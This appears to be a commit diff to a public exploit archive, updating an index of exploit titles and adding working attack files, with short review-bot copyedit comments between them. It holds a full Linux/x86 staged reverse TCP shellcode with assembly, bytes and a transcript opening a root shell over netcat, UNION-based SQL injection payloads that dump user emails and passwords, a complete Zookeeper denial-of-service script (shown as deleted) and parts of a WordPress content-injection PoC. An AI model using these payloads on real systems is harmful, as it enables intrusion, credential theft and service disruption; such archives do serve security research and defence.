DB: 2017-02-09
3 new exploits Zookeeper 3.5.2 - Denial of Service Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes) YapBB 1.2 - (forumID) Blind SQL Injection YapBB 1.2 - 'forumID' Parameter Blind SQL Injection ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD ClearBudget 0.6.1 - Insecure Database Download phpYabs 0.1.2 - (Azione) Remote File Inclusion phpYabs 0.1.2 - 'Azione' Parameter Remote File Inclusion IF-CMS 2.0 - 'frame.php id' Blind SQL Injection IF-CMS 2.0 - 'id' Parameter Blind SQL Injection BusinessSpace 1.2 - 'id' SQL Injection A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection BusinessSpace 1.2 - 'id' Parameter SQL Injection A Better Member-Based ASP Photo Gallery - 'entry' Parameter SQL Injection FlexCMS - (catId) SQL Injection FlexCMS 2.5 - 'catId' Parameter SQL Injection Thyme 1.3 - (export_to) Local File Inclusion Papoo CMS 3.x - (pfadhier) Local File Inclusion q-news 2.0 - Remote Command Execution Potato News 1.0.0 - (user) Local File Inclusion Thyme 1.3 - 'export_to' Parameter Local File Inclusion Papoo CMS 3.x - 'pfadhier' Parameter Local File Inclusion Q-News 2.0 - Remote Command Execution Potato News 1.0.0 - Local File Inclusion Mynews 0_10 - Authentication Bypass Mynews 0.10 - Authentication Bypass Muviko Video CMS - SQL Injection Multi Outlets POS 3.1 - 'id' Parameter SQL Injection
This commit is contained in:
parent
2ff74c7c1b
commit
d1a0e8f9fd
6 changed files with 257 additions and 115 deletions
28
files.csv
|
@ -5359,7 +5359,6 @@ id,file,description,date,author,platform,type,port
|
|||
41219,platforms/hardware/dos/41219.txt,"QNAP NVR/NAS - Buffer Overflow",2017-02-01,bashis,hardware,dos,0
|
||||
41222,platforms/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",windows,dos,0
|
||||
41232,platforms/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",android,dos,0
|
||||
41277,platforms/linux/dos/41277.py,"Zookeeper 3.5.2 - Denial of Service",2017-02-07,"Brandon Dennis",linux,dos,0
|
||||
41278,platforms/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,openbsd,dos,80
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
|
@ -15876,6 +15875,7 @@ id,file,description,date,author,platform,type,port
|
|||
41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
|
||||
41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
|
||||
41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -20682,12 +20682,12 @@ id,file,description,date,author,platform,type,port
|
|||
7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - 'bbcode.php l' Local File Inclusion",2009-02-04,Osirys,php,webapps,0
|
||||
7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0
|
||||
7982,platforms/asp/webapps/7982.txt,"team 1.x - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0
|
||||
7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0
|
||||
7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - 'forumID' Parameter Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0
|
||||
7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass",2009-02-04,JosS,php,webapps,0
|
||||
7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0
|
||||
7992,platforms/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion",2009-02-05,SirGod,php,webapps,0
|
||||
7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0
|
||||
7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0
|
||||
7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - Insecure Database Download",2009-02-05,Room-Hacker,php,webapps,0
|
||||
7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0
|
||||
7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0
|
||||
7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0
|
||||
|
@ -20696,29 +20696,29 @@ id,file,description,date,author,platform,type,port
|
|||
8002,platforms/php/webapps/8002.txt,"CafeEngine - 'catid' Parameter SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
|
||||
8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-06,JosS,php,webapps,0
|
||||
8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0
|
||||
8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
|
||||
8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - 'Azione' Parameter Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
|
||||
8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,php,webapps,0
|
||||
8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - 'frame.php id' Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0
|
||||
8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - 'id' Parameter Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0
|
||||
8009,platforms/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0
|
||||
8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' SQL Injection",2009-02-09,K-159,php,webapps,0
|
||||
8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection",2009-02-09,BackDoor,php,webapps,0
|
||||
8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' Parameter SQL Injection",2009-02-09,K-159,php,webapps,0
|
||||
8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' Parameter SQL Injection",2009-02-09,BackDoor,php,webapps,0
|
||||
8014,platforms/php/webapps/8014.pl,"PHP Director 0.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0
|
||||
8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS 1.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0
|
||||
8016,platforms/php/webapps/8016.txt,"AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0
|
||||
8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0
|
||||
8018,platforms/php/webapps/8018.txt,"FlexCMS - (catId) SQL Injection",2009-02-09,MisterRichard,php,webapps,0
|
||||
8018,platforms/php/webapps/8018.txt,"FlexCMS 2.5 - 'catId' Parameter SQL Injection",2009-02-09,MisterRichard,php,webapps,0
|
||||
8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 (09.01.22) - Cross-Site Scripting",2009-02-09,make0day,php,webapps,0
|
||||
8020,platforms/php/webapps/8020.txt,"Yet Another NOCC 0.1.0 - Local File Inclusion",2009-02-09,Kacper,php,webapps,0
|
||||
8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusion",2009-02-09,ahmadbady,php,webapps,0
|
||||
8026,platforms/php/webapps/8026.txt,"WB News 2.1.1 - config[installdir] Remote File Inclusion",2009-02-09,ahmadbady,php,webapps,0
|
||||
8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 - 'gastbuch.php' Remote File Disclosure",2009-02-09,bd0rk,php,webapps,0
|
||||
8028,platforms/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - Local File Inclusion / Remote Command Execution",2009-02-09,Osirys,php,webapps,0
|
||||
8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - (export_to) Local File Inclusion",2009-02-10,cheverok,php,webapps,0
|
||||
8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0
|
||||
8031,platforms/php/webapps/8031.pph,"q-news 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0
|
||||
8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - (user) Local File Inclusion",2009-02-10,x0r,php,webapps,0
|
||||
8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - 'export_to' Parameter Local File Inclusion",2009-02-10,cheverok,php,webapps,0
|
||||
8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - 'pfadhier' Parameter Local File Inclusion",2009-02-10,SirGod,php,webapps,0
|
||||
8031,platforms/php/webapps/8031.pph,"Q-News 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0
|
||||
8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - Local File Inclusion",2009-02-10,x0r,php,webapps,0
|
||||
8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
|
||||
8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
|
||||
8034,platforms/php/webapps/8034.txt,"Mynews 0.10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
|
||||
8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - Authentication Bypass",2009-02-10,x0r,php,webapps,0
|
||||
8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,php,webapps,0
|
||||
8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure",2009-02-10,Lolek,php,webapps,0
|
||||
|
@ -37201,3 +37201,5 @@ id,file,description,date,author,platform,type,port
|
|||
41270,platforms/php/webapps/41270.txt,"FTP Made Easy PRO 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0
|
||||
41271,platforms/php/webapps/41271.txt,"Easy File Uploader 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0
|
||||
41272,platforms/php/webapps/41272.txt,"Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure",2017-02-07,"Wiswat Aswamenakul",php,webapps,0
|
||||
41279,platforms/php/webapps/41279.txt,"Muviko Video CMS - SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps,0
|
||||
41280,platforms/php/webapps/41280.txt,"Multi Outlets POS 3.1 - 'id' Parameter SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps,0
|
||||
|
|
|
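Review bot: The commit description lists `Zookeeper 3.5.2 - Denial of Service` among the three new exploits, but the first hunk (`@ -5359,7 +5359,6`) removes one row from the dos block that holds the 41277 Zookeeper entry, and the `@ -1,86 +0,0` section further down deletes that script outright; the description should record the removal rather than an addition (this rendering drops the +/- markers, so which row is dropped is inferred from the deleted file, not read directly). Separately, the retitled 8031 row keeps the path `platforms/php/webapps/8031.pph`, whose extension looks like a slip for `.php`; worth confirming against the stored file, since the index path is what readers use to locate the entry.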
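--- /dev/null
+++ b/platforms/lin_x86/shellcode/41282.nasm
@@ -0,0 +1,198 @@
+########### Reverse TCP Staged Alphanumeric Shellcode Linux x86 Execve /bin/sh ########
+########### Author: Snir Levi, Applitects #############
+## 103 Bytes ##
+
+date: 9.2.17
+Automatic python shellcode handler (with stage preset send) will be ready soon:
+https://github.com/snir-levi/Reverse_TCP_Alphanumeric_Staged_Shellcode_Execve-bin-bash/
+
+
+IP - 127.0.0.1
+PORT - 4444
+
+#### Stage Alphanumeric shellcode: #####
+Stage 1:
+dup2 stdin syscall:
+
+WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
+
+W push edi
+X pop eax
+W push edi
+[ pop ebx
+j? push 0x3f
+X pop eax
+V push esi
+[ pop ebx
+W push edi
+Y pop ecx
+P push eax
+X pop eax
+P push eax
+X pop EAX
+
+Stage 2:
+dup2 stdout syscall:
+
+WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX
+
+W push edi
+X pop eax
+W push edi
+[ pop ebx
+j? push 0x3f
+X pop eax
+V push esi
+[ pop ebx
+W push edi
+Y pop ecx
+A inc ecx (ecx =1)
+P push eax
+X pop eax
+P push eax
+
+Stage 3:
+dup2 stderr syscall:
+
+WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
+
+W push edi
+X pop eax
+W push edi
+[ pop ebx
+j? push 0x3f
+X pop eax
+V push esi
+[ pop ebx
+W push edi
+Y pop ecx
+A*2 inc ecx (ecx = 2)
+P push eax
+X pop eax
+A inc ecx
+
+Stage 3:
+execve /bin/sh:
+
+j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[
+
+j0 push 0x30
+X pop eax
+H*32 dec eax //eax = 0x0b
+W push edi
+Y pop ecx
+W push edi
+Z pop edx
+W push edi // null terminator
+h//sh push 0x68732f2f //sh
+h/bin push 0x6e69622f /bin
+T push esp
+[ pop ebx
+
+Usage: Victim Executes the shellcode, and opens tcp connection
+
+Stage:
+After Connection is established, send the 4 stages ***separately***
+
+nc -lvp 4444
+connect to [127.0.0.1] from localhost [127.0.0.1] (port)
+WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
+WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX
+WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
+j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[
+
+whoami
+root
+id
+uid=0(root) gid=0(root) groups=0(root)
+
+
+global _start
+
+
+_start:
+
+; sock = socket(AF_INET, SOCK_STREAM, 0)
+; AF_INET = 2
+; SOCK_STREAM = 1
+; syscall number 102 - socketcall
+; socket = 0x01
+
+xor eax,eax
+xor esi,esi
+push eax
+pop edi
+push eax
+mov al, 0x66
+push byte 0x1
+pop ebx
+push byte ebx
+push byte 0x2
+mov ecx, esp
+int 0x80
+
+xchg esi, eax; save sock result
+
+; server.sin_family = AF_INET
+; server.sin_port = htons(PORT)
+; server.sin_addr.s_addr = inet_addr("127.0.0.1")
+
+push byte 0x1
+pop edx
+shl edx, 24
+mov dl, 0x7f ;edx = 127.0.0.1 (hex)
+push edx
+push word 0x5c11 ;port 4444
+push word 0x02
+
+; connect(sock, (struct sockaddr *)&server, sockaddr_len)
+
+mov al, 0x66
+mov bl, 0x3
+mov ecx, esp
+push byte 0x10
+push ecx
+push esi
+mov ecx ,esp
+int 0x80
+
+
+stageAddress: ;saves stage address to edx
+mov edx, [esp]
+sub bl,3
+jnz stage
+
+call near stageAddress
+
+;recv(int sockfd, void *buf, size_t len, int flags);
+
+stage:
+mov al, 0x66
+mov bl, 10
+push edi
+push word 100 ; buffer size
+push edi
+push esi ; socketfd
+mov [esp+4],esp ; sets esp as recv buffer
+mov ecx,esp
+int 0x80
+mov al, 0xcd
+mov ah, 0x80 ; eax = int 0x80
+mov bl, 0xFF
+mov bh, 0xE2 ; ebx = jmp edx
+mov [esp+57],al
+mov [esp+58],ah
+mov [esp+59], ebx ;the end of the buffer contains the syscall command int 0x80 and jmp back to stage
+jmp esp
+
+
+
+unsigned char[] = "\x31\xc0\x31\xf6\x50\x5f\x50\xb0\x66\x6a\x01\x5b\x53\x6a
+\x02\x89\xe1\xcd\x80\x96\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52
+\x66\x68\x11\x5c\x66\x6a\x02\xb0\x66\xb3\x03\x89\xe1\x6a\x10\x51\x56\x89\xe1
+\xcd\x80\x8b\x14\x24\x80\xeb\x03\x75\x05\xe8\xf3\xff\xff\xff
+\xb0\x66\xb3\x0a\x57\x66\x6a\x64\x57\x56\x89\x64\x24\x04\x89\xe1\xcd\x80\xb0
+\xcd\xb4\x80\xb3\xff\xb7\xe2\x88\x44\x24\x39\x88\x64\x24\x3a
+\x89\x5c\x24\x3b\xff\xe4"
+
+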
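Review bot: The walkthrough labels both the dup2-stderr block and the execve block `Stage 3:`, while the usage text says to send four stages and the transcript shows four payloads; the execve heading should read `Stage 4:`. In the socket() sequence, `push byte ebx` is unlikely to assemble as written (NASM does not accept a size prefix on a register push, as far as I know), and the byte string at the end of the file encodes a plain `push ebx` (`\x53`), so the listing should read `push ebx` to match the bytes that were actually shipped. The header's `date: 9.2.17` is ambiguous (day-month or month-day) and differs from the 2017-02-08 date that files.csv records for 41282; an ISO date would settle it. The closing `unsigned char[] = "..."` is also not a valid C declaration (no identifier), presumably meant as `unsigned char shellcode[] = "..."`.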
|
@ -1,86 +0,0 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
# Exploit Title: Zookeeper Client Denial Of Service (Port 2181)
|
||||
# Date: 2/7/2017
|
||||
# Exploit Author: Brandon Dennis
|
||||
# Email: bdennis@mail.hodges.edu
|
||||
# Software Link: http://zookeeper.apache.org/releases.html#download
|
||||
# Zookeeper Version: 3.5.2
|
||||
# Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86
|
||||
# Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client.
|
||||
# This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic.
|
||||
# The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zookeeper.
|
||||
# This should effect Linux x86 & x64 as well
|
||||
|
||||
|
||||
|
||||
import time
|
||||
import os
|
||||
import threading
|
||||
import sys
|
||||
import socket
|
||||
|
||||
numOfThreads = 1
|
||||
exitStr = "n"
|
||||
stop_threads = False
|
||||
threads = []
|
||||
ipAddress = "192.168.1.5" #Change this
|
||||
port = 2181
|
||||
|
||||
def sendCommand(ipAddress, port):
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((ipAddress, port))
|
||||
s.send("wchp\r".encode("utf-8"))
|
||||
s.recv(1024)
|
||||
s.send("wchc\r".encode("utf-8"))
|
||||
s.close()
|
||||
except:
|
||||
pass
|
||||
|
||||
|
||||
def runCMD(id, stop, ipAddress, port):
|
||||
while True:
|
||||
sendCommand(ipAddress, port)
|
||||
if stop():
|
||||
break
|
||||
return
|
||||
|
||||
def welcomeBanner():
|
||||
banner = """ _______ __ _____ _
|
||||
|___ | | / / / __ \ | |
|
||||
/ /| |/ / | / \/_ __ __ _ ___| |__ ___ _ __
|
||||
/ / | \ | | | '__/ _` / __| '_ \ / _ | '__|
|
||||
./ /__| |\ \ | \__/| | | (_| \__ | | | | __| |
|
||||
\_____\_| \_/ \____|_| \__,_|___|_| |_|\___|_|
|
||||
|
||||
By: Brandon Dennis
|
||||
Email: bdennis@mail.hodges.edu
|
||||
"""
|
||||
print(banner)
|
||||
|
||||
|
||||
welcomeBanner()
|
||||
numOfThreads = int(input("How many threads do you want to use: "))
|
||||
print ("Startin Up Threads...")
|
||||
for i in range(numOfThreads):
|
||||
t = threading.Thread(target=runCMD, args=(id, lambda: stop_threads, ipAddress, port))
|
||||
threads.append(t)
|
||||
t.start()
|
||||
print("Threads are now started...")
|
||||
|
||||
|
||||
while exitStr != "y":
|
||||
inpt = input("Do you wish to stop threads(y): ")
|
||||
|
||||
if inpt == "y":
|
||||
exitStr = "y"
|
||||
|
||||
print("\nStopping Threads...")
|
||||
stop_threads = True
|
||||
for thread in threads:
|
||||
thread.join()
|
||||
|
||||
print("Threads are now stopped...")
|
||||
sys.exit(0);
|
||||
|
|
@ -1,14 +1,3 @@
|
|||
# Exploit Title: Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
|
||||
# Date: 2017-02-02
|
||||
# Exploit Author: @leonjza
|
||||
# Vendor Homepage: https://wordpress.org/
|
||||
# Software Link: https://wordpress.org/wordpress-4.7.zip
|
||||
# Version: Wordpress 4.7.0/4.7.1
|
||||
# Tested on: Debian Jessie
|
||||
#
|
||||
# PoC gist: https://gist.github.com/leonjza/2244eb15510a0687ed93160c623762ab
|
||||
#
|
||||
|
||||
# 2017 - @leonjza
|
||||
#
|
||||
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
|
||||
|
@ -61,7 +50,7 @@ def get_posts(api_base):
|
|||
posts = json.loads(respone.read())
|
||||
|
||||
for post in posts:
|
||||
print(' - Post ID: {}, Title: {}, Url: {}'
|
||||
print(' - Post ID: {0}, Title: {1}, Url: {2}'
|
||||
.format(post['id'], post['title']['rendered'], post['link']))
|
||||
|
||||
|
||||
|
@ -76,11 +65,11 @@ def update_post(api_base, post_id, post_content):
|
|||
req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
|
||||
response = urllib2.urlopen(req).read()
|
||||
|
||||
print('* Post updated. Check it out at {}'.format(json.loads(response)['link']))
|
||||
print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))
|
||||
|
||||
|
||||
def print_usage():
|
||||
print('Usage: {} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
|
||||
print('Usage: {0} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
@ -98,7 +87,7 @@ if __name__ == '__main__':
|
|||
|
||||
print('* Discovering API Endpoint')
|
||||
api_url = get_api_url(sys.argv[1])
|
||||
print('* API lives at: {}'.format(api_url))
|
||||
print('* API lives at: {0}'.format(api_url))
|
||||
|
||||
# if we only have a url, show the posts we have have
|
||||
if len(sys.argv) < 3:
|
||||
|
@ -108,7 +97,7 @@ if __name__ == '__main__':
|
|||
sys.exit(0)
|
||||
|
||||
# if we get here, we have what we need to update a post!
|
||||
print('* Updating post {}'.format(sys.argv[2]))
|
||||
print('* Updating post {0}'.format(sys.argv[2]))
|
||||
with open(sys.argv[3], 'r') as content:
|
||||
new_content = content.readlines()
|
||||
|
||||
|
|
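--- /dev/null
+++ b/platforms/php/webapps/41279.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Muviko Video CMS Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.02.2017
+# Vendor Homepage: https://muvikoscript.com/
+# Software Buy: https://codecanyon.net/item/muviko-movie-video-cms/19402086
+# Demo: https://demo.muvikoscript.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search.php?q=[SQL]
+# -9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,email,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users-- -
+# http://localhost/[PATH]/category.php?id=[SQL]
+# -9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,email,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users-- -
+# Etc...
+# # # # #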
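--- /dev/null
+++ b/platforms/php/webapps/41280.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Point of Sales - Multi Outlets POS v3.1 Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.02.2017
+# Vendor Homepage: http://prosoft-apps.com/
+# Software Buy: https://codecanyon.net/item/point-of-sales-multi-outlets-pos/17674742
+# Demo: http://pos.prosoft-apps.com/pos/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/view_invoice?id=[SQL]
+# Etc...
+# # # # #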
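Review bot: The header gives `# Version: N/A` while its own title says `Multi Outlets POS v3.1` and the files.csv row for 41280 records version 3.1; the field should read `# Version: 3.1` so the index and the advisory agree on the affected release. `# Tested on: Win7 x64, Kali Linux x64` reads as the tester's client machines rather than the server stack the application ran on, which is the detail a defender needs to judge exposure; if known, naming the server-side platform here would be more useful.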